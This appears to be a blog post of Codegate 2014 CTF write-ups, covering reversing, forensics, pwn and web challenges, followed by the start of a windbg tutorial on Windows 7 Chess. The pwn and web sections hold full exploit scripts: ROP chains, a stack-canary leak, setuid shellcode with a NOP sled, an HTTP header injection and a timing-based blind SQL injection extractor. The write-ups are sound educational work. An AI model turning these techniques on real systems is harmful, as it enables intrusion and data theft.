Belated Codegate 2014 Quals Writeups and Lessons Learned

The local challenges can be grabbed from here and various other writeups are online. I was off on the timing for this one, so I only dove into most the challenges on Sunday morning… right before codegate ended and after it ended. I did pretty terrible rank-wise, but I thought the challenges were fun anyway and solved some after the codegate was over.

I learn new things almost every CTF, even if it’s sometimes just things that make sense intuitively but I’ve just never thought about before or forgotten. Here are some lessons learned from codegate.

  • stack canaries on linux stay constant and you can get them with an info leak. On windows there is more entropy and this wouldn’t have been as straightforward (see Pwn 250)
  • ulimit -s pretty much defeats ASLR if you’re local. Also, there are areas you can overwrite in this space, like in the syscall mappings, to control the instruction pointer (See Pwn 350 and Pwn 400)
  • To control the number of bytes output locally, you can use non-blocking sockets (see Pwn 400)
  • gdb really can’t find gs: segments very well, but there are usually workarounds (see Pwn 350)
  • You can’t call openprocess with all access on a process being debugged (i.e. you can’t open two debuggers on the same process, even if it’s been forked) but you can openprocess with PROCESS_VM_READ. (reversing 250 – although I ended up going a different route)
  • I wrote a Pykd script that can be called on a windbg breakpoint and continue based on python stuff e.g. you could do a conditional break on a regex which seems tough in windbg without writing a script. (see reversing 250)
  • SQLmap has a cool testbed where you can test your sql syntax, available at https://github.com/sqlmapproject/testenv (used to test web 500)

Reversing 200 dodoCrackme

Running strace

$ strace ./crackme_d079a0af0b01789c01d5755c885da4f6 
execve("./crackme_d079a0af0b01789c01d5755c885da4f6", ["./crackme_d079a0af0b01789c01d575"...], [/* 37 vars */]) = 0
mmap(NULL, 30000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ffff7ff6000
write(1, "r", 1r)                        = 1
write(1, "o", 1o)                        = 1
write(1, "o", 1o)                        = 1
write(1, "t", 1t)                        = 1
write(1, "@", 1@)                        = 1
write(1, "l", 1l)                        = 1
write(1, "o", 1o)                        = 1
write(1, "c", 1c)                        = 1
write(1, "a", 1a)                        = 1
write(1, "l", 1l)                        = 1
write(1, "h", 1h)                        = 1
write(1, "o", 1o)                        = 1
write(1, "s", 1s)                        = 1
write(1, "t", 1t)                        = 1
write(1, "'", 1')                        = 1
write(1, "s", 1s)                        = 1
write(1, " ", 1 )                        = 1
write(1, "p", 1p)                        = 1
write(1, "a", 1a)                        = 1
write(1, "s", 1s)                        = 1
write(1, "s", 1s)                        = 1
write(1, "w", 1w)                        = 1
write(1, "o", 1o)                        = 1
write(1, "r", 1r)                        = 1
write(1, "d", 1d)                        = 1
write(1, ":", 1:)                        = 1
...

it looks like they’re doing syscalls for every character written and read

Most of the binary is garbage, but you can see clusters of syscalls where the output and input happen. Looking in IDA, there are four clusters of syscalls. One outputs the fail, one outputs “Enter root password”, one is a huge loop that inputs the password, and one outputs winner.

With gdb, I recorded executions and executed backworkds until I was in the giant input loop. At that point I started searching for the password was as an offset to rbp, since this is how it outputs strings as syscalls. Sure enough, I found it pretty quickly.


import gdb
import binascii
import sys


def read_weird_string(start_addr, spacing=8, block=100):
    a = gdb.selected_inferior().read_memory(start_addr, block * spacing)
    #for i in range(0,block):
    #   print
    #print help(a)
    for i in a:
        if i == "\x00":
            continue
        sys.stdout.write(i)
    print
    print binascii.hexlify(a)


read_weird_string(0x7ffff7ff9b50) #this is $rbp - around 50
gdb-peda$ source decode_string.py 
H4PPY_C0DEGaTE_2014_CU_1N_K0RE4

Reversing 250 Clone Technique

This one has on the description: “Limited processes will be generated. Which one has the flag?”

We can see in the main function that it will call createProcessW in a loop that lasts 0x190 iterations, so that’s our number of processes.

12c

Each process is called with three args, #randomlookingnumber# #randomlookingnumber# #counter#, where counter is 0,1,2,…

One thing I tried to do throughout this was put a breakpoint on memory access. For example,

ba w4 00409754

The value would change, but the breakpoint is never hit. Crazy! After some investigation with Joe, we eventually figured out this is because ba works by putting a break in one of four registers per processes. In our case, the memory is written to using a call to WriteProcessMemory, and the kernel is writing the memory, so our breakpoint is never hit.

Investigating this led to the cinit function, which is called before main and contains the calls to writeprocessmemory. It starts with code that grabs the command line args if they exist (and if not sets them to the first value. It then pushes them along with this interesting data string to a function, messes with a string it returns, and then 0s out that string. Even without looking at what the decode_func is doing, it looks like a likely place for a key!

decode_func

My strategy was then to attach windbg to every one of these forked processes by turning childdbg on, changing the filters to control when it breaks, and set a breakpoint right before the rep stosd. I then wrote a python script to see if this is a candidate for the key.

>type windbg.txt
.childdbg 1
.load pykd.pyd
sxr
sxe -c "bp 00401201 \"!py iskey.py\";g"  ibp
sxi epr

>type iskey.py
#!/usr/bin/python

import pykd
import struct
import binascii

def is_possible_key(mstr):
  try:
    mstr = mstr[:mstr.index(0)]
  except ValueError:
    return False
  print mstr
  for i in mstr:
    if not (i >= 0x20 and i <= 0x7e):
      return False
  if len(mstr) > 5:
    print "".join([chr(i) for i in mstr])
    return True
  return False

edi = pykd.reg("edi")
a = pykd.loadBytes(edi,30)
if is_possible_key(a):
  print "KEYKEYKEYKEYKEYKEY"
else:
  pykd.dbgCommand("g")

>windbg -c "$$><windbg.txt" clone_technique.exe

This finds our key ‘And Now His Watch is Ended’

Forensics 150

Ok, so our file is a pcap-ng apparently based on the magic bytes, but it doesn’t open with wireshark

0-weirdcap

First I ran foremost on the file, which detected a pdf and a bmp. I then ran a few tools found here http://www.forensicswiki.org/wiki/PDF on the pdf but no luck. Looking at it, it’s

for150_1

Ok, so we might have to fix the pcap-ng file to view this correctly. I don’t know much about the format, but I opened it in a hex editor and searched for DWORD hex(4270407998), which is \x3e \x41 \x89 \xfe. I replaced this with DWORD 96 and got a similar error. Then I kind of brute forced – set it to 0x30 and got a different error. 0x40 gave a too big error. It took about 10 tries of manual binary searching, and then I got a format I could open in wireshark and follow the tcp stream.

for150_2

Then just save the pdf part to a file and we get the key

for150_3

Pwn 250 Angy Doraemon

This was a fun, relatively straightforward challenge. It’s a remote exploit. The bug is in the mouse function. When it reads the answer to “are you sure?” it reads 0x6E bytes into a buffer only a few bytes big.

doremon

The hard part is you have to bypass a non-executable stack and a stack canary. This is possible via an info leak. Because we can write over the end of our string, we can see other values on the stack, such as the canary and the fd. One interesting thing I learned is how on Linux the stack canary seems to be constant per process (on windows, as Matt Miller said, Windows cookies are basically an XOR’d combination of the current system time, process identifier, thread identifier, tick count, and performance counter.)

So you leak the canary, then you have to rop a payload. execl is in the .got, and I used some fancy redirecting to send the output right back through the socket. You need the file descriptor, but it’s on the stack and you need it anyway I think to do a read from the socket.

#!/usr/bin/python

import argparse
import struct
import socket
import binascii
import time

class exploit:
  def __init__(self, args):
    self.command = args.command

    if args.fd == None:
      self.get_fd()
    else:
      self.fd = args.fd

    if args.canary == None:
      self.get_canary()
    else:
      self.canary = binascii.unhexlify(args.canary)

    self.pwn()
    
  def get_canary(self):
    self.canary = ""
    padding = "yAAAAAAAAA"
    #doing one byte at a time simplifies cases where there are null bytes
    for i in range(0,4):
      sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
      sock.connect((args.host, args.port))
      data = self.recv_until(">", sock)
      sock.sendall("4")

      self.recv_until("(y/n) ", sock)
      sock.sendall(padding)
      data = self.recv_until("\"MOUSE!!!!!!!!! (HP - 25)\"", sock)
      if len(data) == 58 + i:
        self.canary += "\x00"
      else:
        self.canary += data[22+i]
      padding += "A"
      sock.close()
    print "canary: ", binascii.hexlify(self.canary)

  def get_fd(self):
    self.canary = ""
    padding = "yAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((args.host, args.port))
    data = self.recv_until(">", sock)
    sock.sendall("4")

    self.recv_until("(y/n) ", sock)
    sock.sendall(padding)
    data = self.recv_until("\"MOUSE!!!!!!!!! (HP - 25)\"", sock)
    sock.close()
    self.fd = ord(data[42])
    print "fd: ", self.fd

  def pwn(self):

    rop = struct.pack("<I", 0x08048620)       # read plt
    rop += struct.pack("<I", 0x8048b2c)       # pop 3 ret
    rop += struct.pack("<I", self.fd)         # fd
    rop += struct.pack("<I", 0x804b508)       # buf 
    rop += struct.pack("<I", 0x256)           # nbytes
    rop += struct.pack("<I", 0x08048710)      # execl
    rop += struct.pack("<I", 0x41424142)      # ret
    rop += struct.pack("<I", 0x0804970D)      # /bin/sh
    rop += struct.pack("<I", 0x0804970D)      # /bin/sh
    rop += struct.pack("<I", 0x804b508)       # buf "-c"
    rop += struct.pack("<I", 0x804b508 + 3)   # buf "command"
    rop += struct.pack("<I", 0x0000000)       # null

    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((args.host, args.port))
    data = self.recv_until(">", sock)
    sock.sendall("4")
    self.recv_until("(y/n) ", sock)

    padding = "yAAAAAAAAA"
    padding += self.canary
    padding += "B" * 12
    sock.sendall(padding + rop)

    self.command += " 0<&{0} 1>&{0}".format(self.fd) #redirect output to our socket
    sock.sendall("-c\x00{0}\x00".format(self.command))

    data = sock.recv(1024)   
    print data
    sock.close() 

  def recv_until(self, string, sock):
    data = ""
    while True:
      tmp = sock.recv(1)
      if tmp == "":
        break
      data += tmp
      if data.endswith(string):
        break
    return data


parser = argparse.ArgumentParser()
parser.add_argument("--host", default="192.168.137.150")
parser.add_argument("--port", default=8888)
parser.add_argument("--canary", default=None)
parser.add_argument("--command", default="whoami")
parser.add_argument("--fd", default=None, type=int)
args = parser.parse_args()

m = exploit(args)

Pwn 350 4stone

This is a binary that plays a game locally, sort of like connect 4. All the interesting things happen if you win the game with 0 time (which you can do with a constant strategy – this took me longer than it should have). If you do win, it grabs some input from stdin.

4stone_numseconds

As you can see from the following snippet, you get an “arbitrary” write (marked in red). There is a catch though. You can write anywhere, as long as it doesn’t start with 0x804, or 0x0b.

4stone_write

The stack is executable, so if we could overwrite anything, then we’d be sitting good. Unfortunately, most everything by default starts at 0x804 or 0x0b.

gdb-peda$ vmmap 
Start      End        Perm	Name
0x08048000 0x0804a000 r-xp	/home/mopey/games/4stone/4stone
0x0804a000 0x0804b000 r-xp	/home/mopey/games/4stone/4stone
0x0804b000 0x0804c000 rwxp	/home/mopey/games/4stone/4stone
0x0804c000 0x0806d000 rwxp	[heap]
0xb7dc2000 0xb7dc3000 rwxp	mapped
0xb7dc3000 0xb7dc6000 r-xp	/lib/i386-linux-gnu/libdl-2.17.so
0xb7dc6000 0xb7dc7000 r-xp	/lib/i386-linux-gnu/libdl-2.17.so
0xb7dc7000 0xb7dc8000 rwxp	/lib/i386-linux-gnu/libdl-2.17.so
0xb7dc8000 0xb7f76000 r-xp	/lib/i386-linux-gnu/libc-2.17.so
0xb7f76000 0xb7f78000 r-xp	/lib/i386-linux-gnu/libc-2.17.so
0xb7f78000 0xb7f79000 rwxp	/lib/i386-linux-gnu/libc-2.17.so
0xb7f79000 0xb7f7d000 rwxp	mapped
0xb7f7d000 0xb7f9b000 r-xp	/lib/i386-linux-gnu/libtinfo.so.5.9
0xb7f9b000 0xb7f9c000 ---p	/lib/i386-linux-gnu/libtinfo.so.5.9
0xb7f9c000 0xb7f9e000 r-xp	/lib/i386-linux-gnu/libtinfo.so.5.9
0xb7f9e000 0xb7f9f000 rwxp	/lib/i386-linux-gnu/libtinfo.so.5.9
0xb7f9f000 0xb7fc2000 r-xp	/lib/i386-linux-gnu/libncurses.so.5.9
0xb7fc2000 0xb7fc3000 r-xp	/lib/i386-linux-gnu/libncurses.so.5.9
0xb7fc3000 0xb7fc4000 rwxp	/lib/i386-linux-gnu/libncurses.so.5.9
0xb7fdb000 0xb7fdd000 rwxp	mapped
0xb7fdd000 0xb7fde000 r-xp	[vdso]
0xb7fde000 0xb7ffe000 r-xp	/lib/i386-linux-gnu/ld-2.17.so
0xb7ffe000 0xb7fff000 r-xp	/lib/i386-linux-gnu/ld-2.17.so
0xb7fff000 0xb8000000 rwxp	/lib/i386-linux-gnu/ld-2.17.so
0xbffdf000 0xc0000000 rwxp	[stack]

hmmm, we can write to the heap, but that’s tough. What can we do locally? My initial thought was to make the stack big enough so it wasn’t in the 0x0b range, then potentially overwrite a return pointer. There’s aslr on, but we might be able to brute force it. So I started filling up the stack with an execve call, but hit a limit. Ok, we can set this with ulimit. I tried this, and set it to unlimited, and something interesting happened. The mapping then looks something like this:

gdb-peda$ vmmap 
Start      End        Perm	Name
0x08048000 0x0804a000 r-xp	/home/mopey/games/4stone/4stone
0x0804a000 0x0804b000 r-xp	/home/mopey/games/4stone/4stone
0x0804b000 0x0804c000 rwxp	/home/mopey/games/4stone/4stone
0x0804c000 0x0806d000 rwxp	[heap]
0x40000000 0x40020000 r-xp	/lib/i386-linux-gnu/ld-2.17.so
0x40020000 0x40021000 r-xp	/lib/i386-linux-gnu/ld-2.17.so
0x40021000 0x40022000 rwxp	/lib/i386-linux-gnu/ld-2.17.so
0x40022000 0x40023000 r-xp	[vdso]
0x40023000 0x40025000 rwxp	mapped
0x4003c000 0x4005f000 r-xp	/lib/i386-linux-gnu/libncurses.so.5.9
0x4005f000 0x40060000 r-xp	/lib/i386-linux-gnu/libncurses.so.5.9
0x40060000 0x40061000 rwxp	/lib/i386-linux-gnu/libncurses.so.5.9
0x40061000 0x4007f000 r-xp	/lib/i386-linux-gnu/libtinfo.so.5.9
0x4007f000 0x40080000 ---p	/lib/i386-linux-gnu/libtinfo.so.5.9
0x40080000 0x40082000 r-xp	/lib/i386-linux-gnu/libtinfo.so.5.9
0x40082000 0x40083000 rwxp	/lib/i386-linux-gnu/libtinfo.so.5.9
0x40083000 0x40084000 rwxp	mapped
0x40084000 0x40232000 r-xp	/lib/i386-linux-gnu/libc-2.17.so
0x40232000 0x40234000 r-xp	/lib/i386-linux-gnu/libc-2.17.so
0x40234000 0x40235000 rwxp	/lib/i386-linux-gnu/libc-2.17.so
0x40235000 0x40238000 rwxp	mapped
0x40238000 0x4023b000 r-xp	/lib/i386-linux-gnu/libdl-2.17.so
0x4023b000 0x4023c000 r-xp	/lib/i386-linux-gnu/libdl-2.17.so
0x4023c000 0x4023d000 rwxp	/lib/i386-linux-gnu/libdl-2.17.so
0x4023d000 0x4023e000 rwxp	mapped
0xbffdf000 0xc0000000 rwxp	[stack]

And a lot of these addresses, like libc, don’t change, even with ASLR! (apparently this is well known, but this is the first I’ve seen it). So where can we write in one of methods? The only function call after our arbitrary write is to exit, which makes a system call. Maybe we can overwrite that?

Tracing this, in the exit .got we have

0x40084000 0x40232000 r-xp	/lib/i386-linux-gnu/libc-2.17.so

   0x4013eb04 <_exit>:	mov    ebx,DWORD PTR [esp+0x4]
   0x4013eb08 <_exit+4>:	mov    eax,0xfc
=> 0x4013eb0d <_exit+9>:	call   DWORD PTR gs:0x10

It turns out gdb sucks at finding the actual address of gs:0x10 sections, so I stepped into it, or you can also find it like this http://stackoverflow.com/questions/10354063/how-to-use-a-logical-address-in-gdb by setting “catch syscall set_thread_area” and looking at the location. Doing this, we see 0x40022414 is mapped to <__kernel_vsyscall>

Because this is bound loosely we can look for references to this in the mapped region.

gdb-peda$ peda searchmem 0x40022414 mapped (searching for the syscall)
Found 1 results, display max 1 items:
mapped : 0x4023d6d0 --> 0x40022414 (<__kernel_vsyscall>:	push   ecx)

It looks like we could overwrite this and it would point somewhere else. Does it work?

gdb-peda$ set {int}0x4023d6d0=0x0c0c0c0c
gdb-peda$ continue 
Continuing.
...
Stopped reason: SIGSEGV
0x0c0c0c0c in ?? ()

Cool. So using this, we can put our shellcode in an environment variable, put a ton of nops there, and point to it. This was the final exploit

#!/usr/bin/python

import os
import argparse
import struct
import sys
from ctypes import *

class exploit:
  def __init__(self, args):
    self.vulnpath = args.path

    #stdin (wins the game and specifies what to write)
    f = open(args.inputfile, "w")
    f.write("\nhhh\nhh\nhh\nhhh\nh\nl\nhhhh\nl\nll\nh\n\n\n")
    #f.write("c0c0c0c0")  #what to write 
    f.write("bfab0b00")  #what to write 

    f.close()

    f = os.open(args.inputfile, int('444', 8))
    print f
    print sys.stdin
    os.dup2(f, 0)

    #arg1 (sepcifies where to write)   
    self.argv = "4023d6d0" 

    #environment (shellcode) /bin/sh setuid 1003
    dashsc = (
"\xdb\xc8\xd9\x74\x24\xf4\xbf\xa2\x35\xcc\x83\x5b\x31\xc9" +
"\xb1\x0b\x83\xeb\xfc\x31\x7b\x14\x03\x7b\xb6\xd7\x39\xb2" +
"\x76\xa7\x84\x0e\x9d\xcb\x08\x71\xd8\x27\x0b\x71\x1a\x75" +
"\x8c\x40\xda\xd5\xe5\x8d\xf5\xa6\x9d\xb9\x26\x2b\x37\x54" +
"\xb1\x48\x97\xfb\x48\x6f\x29\x2e\xfa\x7b\x87\x4e"
    )

    self.env = { "TERM": "xterm" }
    for i in range(0,100):
      self.env[str(i)] = "\x90" * 100000 + dashsc

  def pwn(self):
    os.execve( self.vulnpath, [self.vulnpath, self.argv], self.env)
    
parser = argparse.ArgumentParser()
parser.add_argument("--inputfile", default="input.txt")
parser.add_argument("--path")

args = parser.parse_args()
m = exploit(args)
m.pwn()

Pwn 400 minibomb

The overflow on this is straightforward, but the executable is tiny, and there’s not a lot of rop you can do. Using the ulimit -s unlimited trick, you only have a handful of gadgets.

gdb-peda$ x/4i 0x40000424
   0x40000424 <__kernel_vsyscall+16>:	pop    ebp
   0x40000425 <__kernel_vsyscall+17>:	pop    edx
   0x40000426 <__kernel_vsyscall+18>:	pop    ecx
   0x40000427 <__kernel_vsyscall+19>:	ret   
gdb-peda$ x/2i 0x080480F3
   0x80480f3:	mov    ebx,0x0
   0x80480f8:	int    0x80

We can control edx and ecx with the gadget at 0x40000425, and another interesting thing is we may be able to control ebx indirectly if we can write to unk_8049150

.text:080480B4 lea     ebx, unk_8049150 ; start
.text:080480BA int     80h             ; 

We have almost all we need for a system call, except we don’t have eax anywhere. After some research, one thing that’s promising is both “read” and “write” will return eax to the value of bytes read or written. My first thought was if I could set ecx or edx with the gadget at 0x40000425 then I might be able to use one of the existing reads or writes to control eax. This is close to working, like if they would mov eax, 4 (syswrite) immmediately before the int 80, it would have worked. But unfortunately there’s no flow like that. They all move eax, 4 at the beginning, then set all the args afterward.

I was stuck here, but luckily the good thing about trying this one late is there are solutions posted. This is an excellent writeup, and I used it to cheat: http://mslc.ctf.su/wp/codegate-2014-quals-minibomb-pwn-400/. They set a nonblocking socket to control how much could be written. Cool! I never would’ve though of that.

Using More Smoked Leet Chicken’s technique

#!/usr/bin/python
#listener.py

import socket
import time

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("127.0.0.1", 30123))
s.listen(1)

while True:
  conn, ts = s.accept()
  conn.sendall("/tmp/blah\x00 ")
  time.sleep(1)
  print "got connection"
  conn.close()
#!/usr/bin/python
#exploit.py

import argparse
import struct
import socket
import time
from subprocess import *

class exploit:
  def __init__(self, args):

    self.vulnpath = args.path

    padding = "A" * 16

    rop = struct.pack("<I", 0x40000425)  #pop edx, pop ecx, ret
    rop += struct.pack("<I", 11)         #edx (length)
    rop += struct.pack("<I", 0x08049150) #ecx (buffer)
    #eax is 3 due to pipe
    rop += struct.pack("<I", 0x08048143) #read syscall.. 0804812C to read from stdin?

    #eax is 11 due to read 11
    rop += "AAAAAAAAAAAAAAAA"
    rop += struct.pack("<I", 0x40000425)  #pop edx, pop ecx, ret
    rop += struct.pack("<I", 0)  
    rop += struct.pack("<I", 0)  
    rop += struct.pack("<I", 0x080480B4)

    self.payload = padding + rop

  def pwn(self):
    out_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    out_sock.connect(("127.0.0.1", 30123))
    out_sock.setblocking(0)

    #find the right value
    out_sock.sendall("A" * eval(args.sendsize))

    p = Popen(self.vulnpath, shell=True, stdin=PIPE, stdout=out_sock)

    p.stdin.write(self.payload)


parser = argparse.ArgumentParser()
parser.add_argument('--path', default="./minibomb")
parser.add_argument('--sendsize', default=0)

args = parser.parse_args()
m = exploit(args)
m.pwn()
$ ulimit -s
unlimited 
$ cat /tmp/blah 
#!/bin/bash -p

/usr/bin/id > /tmp/output
$ python exploit.py --sendsize='4096 * 332 + 1024 + 256 + 64 + 32 +19' --path="./minibomb"
$ cat /tmp/output 
uid=1000(test) gid=1000(test) groups=1000(test)

Web 200

I banged my head against this one for a while. In the comments was
I tried things like looking for .htaccess, etc, but no luck.

This looked promising

this looks promising

http://58.229.183.25/188f6594f694a3ca082f7530b5efc58dedf81b8d/index.php?url=localhost%2F188f6594f694a3ca082f7530b5efc58dedf81b8d%2Fadmin

But you only get the first two lines back and the content length. But it turns out there’s a header injection!

GET /188f6594f694a3ca082f7530b5efc58dedf81b8d/index.php?url=localhost%2F188f6594f694a3ca082f7530b5efc58dedf81b8d%2Fadmin/+HTTP/1.0%0d%0aHost:+localhost%0d%0aRange:+bytes%3d372-430%0d%0a%0d%0a HTTP/1.1
Host: 58.229.183.25
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

This responds with

<!--if($_SERVER[HTTP_HOST]=="hackme")--></body>

Cool. Requesting it directly, even with the header, still gives a forbidden. But we can reuse the header injection enough and we can play around with the bytes.

GET /188f6594f694a3ca082f7530b5efc58dedf81b8d/index.php?url=localhost%2F188f6594f694a3ca082f7530b5efc58dedf81b8d%2Fadmin/+HTTP/1.0%0d%0aHost:+hackme%0d%0aRange:+bytes%3d76-127%0d%0a%0d%0a HTTP/1.1
Host: 58.229.183.25
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

In the response is: Password is WH0_IS_SnUS_bI1G_F4N

Web 500

They give us this source.

<?php
session_start();

$link = @mysql_connect('localhost', '', '');
@mysql_select_db('', $link);

function RandomString()
{
  $filename = "smash.txt";
  $f = fopen($filename, "r");
  $len = filesize($filename);
  $contents = fread($f, $len);
  $randstring = '';
  while( strlen($randstring)<30 ){
    $t = $contents[rand(0, $len-1)];
    if(ctype_lower($t)){
    $randstring .= $t;
    }
  }
  return $randstring;
}

$max_times = 120;

if ($_SESSION['cnt'] > $max_times){
  unset($_SESSION['cnt']);
}

if ( !isset($_SESSION['cnt'])){
  $_SESSION['cnt']=0;
  $_SESSION['password']=RandomString();

  $query = "delete from rms_120_pw where ip='$_SERVER[REMOTE_ADDR]'";
  @mysql_query($query);

  $query = "insert into rms_120_pw values('$_SERVER[REMOTE_ADDR]', '$_SESSION[password]')";
  @mysql_query($query);
}
$left_count = $max_times-$_SESSION['cnt'];
$_SESSION['cnt']++;

if ( $_POST['password'] ){
  
  if (eregi("replace|load|information|union|select|from|where|limit|offset|order|by|ip|\.|#|-|/|\*",$_POST['password'])){
    @mysql_close($link);
    exit("Wrong access");
  }

  $query = "select * from rms_120_pw where (ip='$_SERVER[REMOTE_ADDR]') and (password='$_POST[password]')";
  $q = @mysql_query($query);
  $res = @mysql_fetch_array($q);
  if($res['ip']==$_SERVER['REMOTE_ADDR']){
    @mysql_close($link);
    exit("True");
  }
  else{
    @mysql_close($link);
    exit("False");
  }
}

@mysql_close($link);
?>

<head>
<link rel="stylesheet" type="text/css" href="black.css">
</head>

<form method=post action=index.php>
  <h1> <?= $left_count ?> times left </h1>
  <div class="inset">
  <p>
    <label for="password">PASSWORD</label>
    <input type="password" name="password" id="password" >
  </p>
  </div>
  <p class="p-container">
    <span onclick=location.href="auth.php"> Auth </span>
    <input type="submit" value="Check">
  </p>
</form>

The sqli is relatively straightforward. You can have a True/false query like this.

password='or(1=2)and'1
password='or(1=1)and'1

But we have only 120 guesses*, and the password is quite long at 30 chars. This returns true

password='or(CHAR_LENGTH(password)=30)and'1

so that means we have only an average of four queries per letter, or 120 guesses for the whole 30 character password. They are lower case at least, so that can reduce our queries by quite a bit, but if we query all the bits, that’s 5 per letter and is too many with a true/false query (which would need 5 per letter). And if you do a straight binary search of the 30 char password, that’s on the order of a few hundred per session*

But, we really have more than true/false – we have an arbitrary number of states. true, false, and timing. We can sleep different amounts of times, etc. For example, we’re only lacking one bit, so we could ask, is the next bit 1 (return true), 0 (return false), or are all the bits 1 (sleep 10 seconds).
The query ended up pretty complicated, and I had to add some code that checked sanity to make sure letters were being decoded correctly.*

#!/usr/bin/python

import urllib
import httplib
import time
import argparse
import sys

class web500:
    def __init__(self, host="58.229.183.24", port=80, session="", check_iter=-1, debug=False):
        self.conn = httplib.HTTPConnection(host, port)
        self.conn.connect()
        if session == "":
            self.session = self.get_session()
            print "Creating SESSION=" + self.session
        else:
            self.session = session
        
        self.check_iter = check_iter
        self.debug = debug
        self.upperlimit = 120
        self.passwd = ""
        self.pwn()
        
    def pwn(self):
        for letter in range(0,30):
            dstr = ""
            if self.check_iter != -1:
                letter = int(self.check_iter)
            for bit in range(8,3,-1):
                self.upperlimit -=1
                if self.upperlimit < 0:
                    print "ERROR: Went over limit :("
               
                this_char = "LPAD(BIN(ORD(SUBSTR(password,{0},1))),8,'0')".format(letter+1)
                this_bit  = "SUBSTR({0},{1},1)".format(this_char, bit)
                
                if (bit != 4 and not self.debug):
                    #if on binary(password[i])[3:4] == 10: sleep 24
                    #if on binary(password[i])[3:4] == 01: sleep 16
                    #if all more significant bits are 1: sleep 8
                    #if all more significant bits are 0: sleep 4
                    #else: return true if 1, else 0
                    truth = "if(left(SUBSTR({0},4,9),{1})!='10',if(left(SUBSTR({0},4,9),{1})!='01',  if(left(SUBSTR({0},4,9),{1})!='{4}',  if(left(SUBSTR({0},4,9),{1})!='{2}', if({3}=0x31,1,0),sleep(4)),sleep(8)),sleep(16)),sleep(24))".format(this_char, bit-3, "0"*(bit-3), this_bit, "1"*(bit-3))
                else:
                    truth = "if({0}=0x31,1,0)".format(this_bit)
                    
                sql = "'or(" + truth + ")and'1"
                param= "password=" + urllib.quote(sql)
                
                self.conn.putrequest("POST", "/5a520b6b783866fd93f9dcdaf753af08/index.php")
                self.conn.putheader("Content-length", str(len(param)))
                self.conn.putheader("Cookie", "PHPSESSID=" + self.session)
                self.conn.putheader("Content-Type", "application/x-www-form-urlencoded")
                self.conn.endheaders()
                t = time.clock()
                
                self.conn.send(param)                
                resp = self.conn.getresponse()
                data = resp.read()
                t = time.clock() - t
                if t>=24:
                    dstr = "10" + dstr
                    break
                elif t>=16:
                    dstr = "01" + dstr
                    break
                elif t >= 8:
                    dstr = dstr.rjust(5,"1")
                    break
                elif t >= 4:
                    dstr = dstr.zfill(5)
                    break
                elif "True" in data:
                    dstr = "1" + dstr
                else:
                    dstr = "0" + dstr
            print "Index:", letter, "Value", dstr, "Iter:", self.upperlimit
            self.passwd += self.bin_tochar(dstr)
            if self.check_iter != -1:
                break
        print "PASSWORD: ", self.passwd
        
    def bin_tochar(self, c):
        return chr(int("011" + c, 2))
     
    def get_session(self):
        self.conn.putrequest("GET", "/5a520b6b783866fd93f9dcdaf753af08/index.php")
        self.conn.endheaders()
        resp = self.conn.getresponse()
        data = resp.read()
        return resp.getheader("Set-Cookie").split("=")[1].split(";")[0]
        
         
parser = argparse.ArgumentParser()
parser.add_argument("--session", default="")
parser.add_argument("--checkIter", default=-1)
parser.add_argument("--debug", action="store_true")
args = parser.parse_args()
                           
a = web500(session=args.session, check_iter=args.checkIter, debug=args.debug)

web500

Logging in with this password gives us the key:

Congrats! the key is DontHeartMeBaby*$#@!

*If I noticed it, I should’ve done it like other people and noticed I could have just supplied a different sessionID. This looks way easier http://tunz.tistory.com/109

Using windbg to beat my dad at chess

My dad is awesome. He always beats me at chess. With a huge nod to this uninformed post – introduction to reverse engineering win32 applications where they debug minesweeper, I decided to dive into the windows 7 chess game and see if I could give myself a bit of an advantage. I wasn’t sure exactly what I wanted to do other than that. I’ll be using Windows 7 32 bit, and the file is at C:\Program Files\Microsoft Games\Chess\. This tutorial will probably not work with anything but Windows 32 bit. This is a beginner tutorial.

Recon and Defining what we want to do

Following the uninformed post, I wondered if chess might contain symbols also, as this would make my life easier. I have this set in my config, but if you don’t then you will want to set your symbol path.

0:000> .sympath srv*c:\debug*http://msdl.microsoft.com/download/symbols
Symbol search path is: srv*c:\debug*http://msdl.microsoft.com/download/symbols
Expanded Symbol search path is: srv*c:\debug*http://msdl.microsoft.com/download/symbols
0:000> .reload /f *
0:000> lm
start    end        module name
001b0000 00474000   Chess      (pdb symbols)          c:\debug\Chess.pdb\1467728C9EEA429C9FA465213785E17C1\Chess.pdb
6e030000 6e06c000   OLEACC     (pdb symbols)          c:\debug\oleacc.pdb\DC8A57A3E8C648228F2C3650F2BE1D672\oleacc.pdb
6f900000 6f972000   DSOUND     (pdb symbols)          c:\debug\dsound.pdb\F38F478065E247C68EDA699606F56EED2\dsound.pdb

Awesome, we have a chess.pdb. In the uninformed post they use windbg to look at functions, but I find IDA Pro easier to read. Loading chess.exe into IDA we see quite a few functions right off the bat that look interesting. It looks like there’s a Pawn class, a knight class, a bishop class, etc

Pawn::GetCaptureMoves(int const * *)   .text 0102D605 00000017 R . . . B . .
Pawn::GetShadowRadius(void)            .text 0102D621 00000007 R . . . . . .
Knight::Knight(ESide)                  .text 0102D62D 0000001D R . . . B . .
Knight::Clone(void)                    .text 0102D64F 0000002B R . . . . . .
Knight::GetPassiveMoves(int const * *) .text 0102D67F 00000017 R . . . B . .
Knight::CanJump(void)                  .text 0102D69B 00000003 R . . . . . .
Knight::GetPieceType(void)             .text 0102D6A3 00000004 R . . . . . .
Knight::GetShadowRadius(void)          .text 0102D6AC 00000007 R . . . . . .
Bishop::Bishop(ESide)                  .text 0102D6B8 0000001D R . . . B . .
Bishop::Clone(void)                    .text 0102D6DA 0000002B R . . . . . .
